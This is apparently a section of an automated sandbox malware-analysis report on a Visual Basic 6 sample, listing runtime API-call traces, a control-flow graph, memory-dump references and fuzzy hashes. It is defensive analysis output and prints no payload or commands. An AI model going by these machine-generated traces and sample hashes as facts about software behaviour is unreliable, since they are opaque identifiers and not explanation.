                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408C5A
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408C67
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408C77
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408C8F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                                                    • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408CA3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408CB0
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408CC0
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408CD8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408CEC
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408CF9
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408D09
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408D21
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00408D35
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408D42
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408D52
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408DB5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DC0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DCE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DD9
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408DF0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DFD
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E08
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E16
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E21
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E38
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E46
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E51
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E5E
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E69
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408ECE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408ED9
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408EE7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408EF2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F09
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F16
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F21
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F2F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F3A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F51
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F5F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F6A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F77
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F82
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408FE7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408FF2
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409000
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040900B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00409057
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409062
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409070
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040907B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409092
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090A0
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090AB
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090B8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090C3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090DA
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090E8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004090F3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409101
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040910C
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409123
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409130
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040913B
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409149
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409154
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040916B
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00409022
                                                                                                                                                                                    • Part of subcall function 00410180: FindCloseChangeNotification.KERNELBASE(?), ref: 004104ED
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408F99
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                                                    • Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408E80
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                                                    • Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                                                    • Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004091D2
                                                                                                                                                                                  • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 00409245
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040925D
                                                                                                                                                                                  • #600.MSVBVM60(00000008,00000000), ref: 00409273
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60 ref: 00409282
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60 ref: 004092A4
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004092B9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004092CD
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004092DA
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$Copy$List$Error$System$Ansi$#516#631$Bstr$#525#537#580#600#616BoundsChangeCheckChkstkCloseConstruct2DestructFindGenerateHresultNotificationUnicode
                                                                                                                                                                                  • String ID: PR$ RO$ SE$Once$~
                                                                                                                                                                                  • API String ID: 3290240664-1255219571
                                                                                                                                                                                  • Opcode ID: d5fff701b2953cd860e5e11b1a5544c82864759be8fb13f2454ba8dac6c0f824
                                                                                                                                                                                  • Instruction ID: 7d3b41f73b1118d4cefcb71df8c3f05656ff7fe774afdbe4e31ac6fe335ab197
                                                                                                                                                                                  • Opcode Fuzzy Hash: d5fff701b2953cd860e5e11b1a5544c82864759be8fb13f2454ba8dac6c0f824
                                                                                                                                                                                  • Instruction Fuzzy Hash: A213EC75910208EFDB14EFE0EE58ADE7B79FF48301F108169F606A72A0DB745A49CB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00407A50 Relevance: 316.2, APIs: 178, Strings: 2, Instructions: 1164COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 200 407a50-407aba __vbaChkstk 202 407ad8 200->202 203 407abc-407ad6 __vbaNew2 200->203 204 407ae2-407b15 202->204 203->204 206 407b17-407b38 __vbaHresultCheckObj 204->206 207 407b3a 204->207 208 407b44-407b75 206->208 207->208 210 407b77-407b98 __vbaHresultCheckObj 208->210 211 407b9a 208->211 212 407ba4-407bc4 __vbaFreeObj 210->212 211->212 213 407bd3-407be1 212->213 214 407bc6-407bcd __vbaEnd 212->214 215 407be3-407bfd __vbaNew2 213->215 216 407bff 213->216 214->213 217 407c09-407c3c 215->217 216->217 219 407c61 217->219 220 407c3e-407c5f __vbaHresultCheckObj 217->220 221 407c6b-407c97 219->221 220->221 223 407c99-407cba __vbaHresultCheckObj 221->223 224 407cbc 221->224 225 407cc6-407cf6 __vbaFreeObj 223->225 224->225 227 407cf8-407d19 __vbaHresultCheckObj 225->227 228 407d1b 225->228 229 407d25-407d33 227->229 228->229 230 407d51 229->230 231 407d35-407d4f __vbaNew2 229->231 232 407d5b-407d8e 230->232 231->232 234 407d90-407db1 __vbaHresultCheckObj 232->234 235 407db3 232->235 236 407dbd-407deb 234->236 235->236 238 407e10 236->238 239 407ded-407e0e __vbaHresultCheckObj 236->239 240 407e1a-407e70 #618 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeObj 238->240 239->240 241 407e76-407e84 240->241 242 407f98-407fa6 240->242 243 407ea2 241->243 244 407e86-407ea0 __vbaNew2 241->244 245 407fc4 242->245 246 407fa8-407fc2 __vbaNew2 242->246 248 407eac-407edf 243->248 244->248 247 407fce-408001 245->247 246->247 251 408003-408024 __vbaHresultCheckObj 247->251 252 408026 247->252 253 407ee1-407f02 __vbaHresultCheckObj 248->253 254 407f04 248->254 255 408030-40805e 251->255 252->255 256 407f0e-407f3c 253->256 254->256 259 408060-408081 __vbaHresultCheckObj 255->259 260 408083 255->260 261 407f61 256->261 262 407f3e-407f5f __vbaHresultCheckObj 256->262 263 40808d-4080b3 __vbaStrCat __vbaStrMove __vbaFreeStr __vbaFreeObj 259->263 260->263 264 407f6b-407f93 __vbaStrMove __vbaFreeObj 261->264 262->264 265 4080b9-408110 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList 263->265 264->265 268 408112-40812c __vbaNew2 265->268 269 40812e 265->269 270 408138-40816b 268->270 269->270 272 408190 270->272 273 40816d-40818e __vbaHresultCheckObj 270->273 274 40819a-4081c8 272->274 273->274 276 4081ca-4081eb __vbaHresultCheckObj 274->276 277 4081ed 274->277 278 4081f7-4087e2 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaFreeObj __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList call 4125a0 276->278 277->278 304 4087e7-40885d __vbaOnError #669 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaStrCopy __vbaStrCmp 278->304 305 4088bb-4088d6 __vbaStrCmp 304->305 306 40885f-4088b6 call 418c90 * 2 __vbaEnd 304->306 308 408979-408994 __vbaStrCmp 305->308 309 4088dc-4088f5 call 4125a0 305->309 310 408a32-408c4f __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 306->310 308->310 311 40899a-4089b3 call 4125a0 308->311 321 408937-408974 #600 __vbaEnd 309->321 322 4088f7-408931 call 40fba0 call 415660 #580 309->322 325 4089f5-408a2c #600 __vbaEnd 311->325 326 4089b5-4089ef call 40fba0 call 415660 #580 311->326 321->310 322->321 325->310 326->325
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 00407A6E
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,?,?,004025E6), ref: 00407AC6
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407B2C
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000068), ref: 00407B8C
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 00407BB5
                                                                                                                                                                                  • __vbaEnd.MSVBVM60 ref: 00407BCD
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 00407BED
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407C53
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,0000007C), ref: 00407CAE
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 00407CC9
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004053E4,000001BC), ref: 00407D0D
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 00407D3F
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,00000014), ref: 00407DA5
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00407E02
                                                                                                                                                                                  • #618.MSVBVM60(?,00000001), ref: 00407E20
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00407E2B
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004055FC,00000000), ref: 00407E37
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00407E55
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(?,?,004025E6), ref: 00407E61
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,004025E6), ref: 00407E90
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407EF6
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00407F53
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00407F84
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 00407F8D
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,004025E6), ref: 00407FB2
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00408018
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00408075
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004055FC,?), ref: 00408096
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004080A1
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 004080AA
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 004080B3
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004080C8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 004080DC
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 004080E9
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004080F9
                                                                                                                                                                                  • __vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,?,?,?,004025E6), ref: 0040811C
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00408182
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000058), ref: 004081DF
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(?,?), ref: 004081FF
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040820A
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00408216
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00408221
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040822F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040823A
                                                                                                                                                                                  • #517.MSVBVM60(00000000), ref: 00408241
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040824C
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 00408259
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00408275
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408281
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408296
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082AA
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082B7
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082C7
